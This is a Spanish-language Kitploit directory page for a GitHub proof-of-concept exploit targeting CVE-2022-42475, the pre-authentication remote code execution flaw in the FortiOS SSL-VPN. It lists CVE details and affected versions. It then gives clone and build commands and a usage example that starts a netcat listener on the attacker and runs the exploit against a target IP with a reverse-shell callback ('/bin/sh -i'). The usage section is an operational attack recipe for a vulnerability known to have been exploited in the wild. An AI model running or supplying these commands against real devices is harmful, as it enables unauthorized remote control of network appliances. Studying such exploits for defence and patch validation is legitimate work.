Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2022-42475-poc — Proof of Concept (PoC) for research and controlled laboratory validation of CVE-2022-42475, a critical heap-based buffer overflow vulnerability affecting the SSL-VPN service in certain versions of FortiOS. | Kitploit
Herramientas/GitHubGitHub/ull0a/cve-2022-42475-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubull0a/cve-2022-42475-poc

cve-2022-42475-poc

Proof of Concept (PoC) for research and controlled laboratory validation of CVE-2022-42475, a critical heap-based buffer overflow vulnerability affecting the SSL-VPN service in certain versions of FortiOS.

Ver Repositorio
1hace 6h 29mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-42475 PoC

Fortinet SSL VPN Pre-Authentication Remote Code Execution

Descripción

CVE-2022-42475 es una vulnerabilidad de heap-based buffer overflow en el servicio SSL VPN de FortiOS que permite a atacantes no autenticados ejecutar código arbitrario de forma remota (RCE) mediante solicitudes HTTP especialmente diseñadas dirigidas al endpoint /remote/error.

Esta vulnerabilidad fue explotada activamente en la naturaleza (0-day) antes de la publicación del parche oficial.

Ejecución de la PoC

La siguiente captura muestra la ejecución del PoC en un entorno de laboratorio autorizado:

La salida muestra la ejecución del PoC y la interacción con la instancia de FortiOS utilizada para las pruebas.

Ejecución del PoC

Información del CVE

CampoValor
CVE IDCVE-2022-42475
CVSS 3.19.3 (Critical)
VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-122
DescubiertoDiciembre de 2022
Parche oficialFortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16

Versiones Afectadas

  • FortiOS 7.2.0–7.2.2
  • FortiOS 7.0.0–7.0.8
  • FortiOS 6.4.0–6.4.10
  • FortiOS 6.2.0–6.2.11
  • FortiOS 6.0.0–6.0.15
  • FortiOS 5.6.0–5.6.14
  • FortiOS 5.4.0–5.4.13
  • FortiOS 5.2.0–5.2.15
  • FortiOS 5.0.0–5.0.14

Requisitos

  • Go 1.18+ (para compilar el PoC)
  • Acceso de red al objetivo en el puerto 443 (o puerto SSL VPN configurado)
  • Entorno de laboratorio autorizado para realizar las pruebas

Compilación

root@kitploit:~
# Clonar o descargar el código fuente
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc

# Compilar
go build -o exploit exploit.go

# O ejecutar directamente
go run exploit.go <target> <port> <reverse_ip> <params>

Uso

root@kitploit:~
./exploit <target_host> <target_port> <reverse_ip> <param1> [param2...]

Ejemplo

root@kitploit:~
# En el atacante, iniciar listener
nc -lvnp 80

# Ejecutar el exploit
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i
Descargar herramienta